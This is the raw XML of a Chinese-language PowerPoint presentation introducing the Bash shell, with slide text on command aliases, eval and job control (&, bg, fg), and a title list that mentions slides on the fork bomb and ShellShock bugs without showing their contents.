              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>的之一</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="图示 4"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4037831869"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="467544" y="2492896"/>
          <a:ext cx="824440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00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F3747440-D36A-4CA3-B28B-85A9CB8A378E}"/>
                                            </p:graphicEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:graphicEl>
                                              <a:dgm id="{F3747440-D36A-4CA3-B28B-85A9CB8A378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03EC1CA3-4A51-41EA-8F7F-660924ECE996}"/>
                                            </p:graphicEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:graphicEl>
                                              <a:dgm id="{03EC1CA3-4A51-41EA-8F7F-660924ECE99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Funny Bash – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>命令别名</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3861048"/>
            <a:ext cx="8229600" cy="2295911"/>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zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>别名只能在交互式的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>中使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>在一般的非</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>交互式脚本中不能使用别名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>但是使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>命令可以达</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>到别名的效果</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="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067" r="1199"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="467544" y="1248719"/>
            <a:ext cx="8208912" cy="2468313"/>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665" r="31217"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4945647" y="3861048"/>
            <a:ext cx="374096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5297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Funny Bash – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>作业控制</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="985664"/>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altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Unix&amp;Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>系统是一个多用户多任务的操作系统，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Bash Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>当然也支持多任务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>之间</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>的切换和控制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="2420887"/>
            <a:ext cx="2592288" cy="3861049"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent2"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>将任务在后台运行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>查看后台运行的任务将后台停止的任务在后台继续运行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>将后台任务转入到前台运行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9221" name="Picture 5" descr="C:\Users\LKJ2063591\AppData\Roaming\feiq\RichOle\2914622900.bmp"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="1400"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3131840" y="2420888"/>
            <a:ext cx="5544616" cy="3861049"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:extLst/>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879625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25121</TotalTime>
  <Words>1039</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>119</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质朴</vt:lpstr>
      <vt:lpstr>Bash Shell 简介</vt:lpstr>
      <vt:lpstr>目录</vt:lpstr>
      <vt:lpstr>Shell</vt:lpstr>
      <vt:lpstr>Shell分类 </vt:lpstr>
      <vt:lpstr>GNU Bash Shell</vt:lpstr>
      <vt:lpstr>Bash Shell</vt:lpstr>
      <vt:lpstr>Bash Shell</vt:lpstr>
      <vt:lpstr>Funny Bash – 命令别名</vt:lpstr>
      <vt:lpstr>Funny Bash – 作业控制</vt:lpstr>
      <vt:lpstr>Funny Bash – 作业控制</vt:lpstr>
      <vt:lpstr>Funny Bash – 终端GUI</vt:lpstr>
      <vt:lpstr>Funny Bash – Kill 终端</vt:lpstr>
      <vt:lpstr>Bash Bugs (BASH_VERSION &lt; 4.3)</vt:lpstr>
      <vt:lpstr>Bash Bugs -- Fork Bomb</vt:lpstr>
      <vt:lpstr>Bash Bugs -- ShellShock</vt:lpstr>
      <vt:lpstr>Bash Bugs -- ShellShock</vt:lpstr>
      <vt:lpstr>Any Questions?</vt:lpstr>
      <vt:lpstr>END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梁窠金</dc:creator>
  <cp:lastModifiedBy>梁窠金</cp:lastModifiedBy>
  <cp:revision>162</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-04-16T07:49:06Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-05-11T02:30:08Z</dcterms:modified>
</cp:coreProperties>
</file>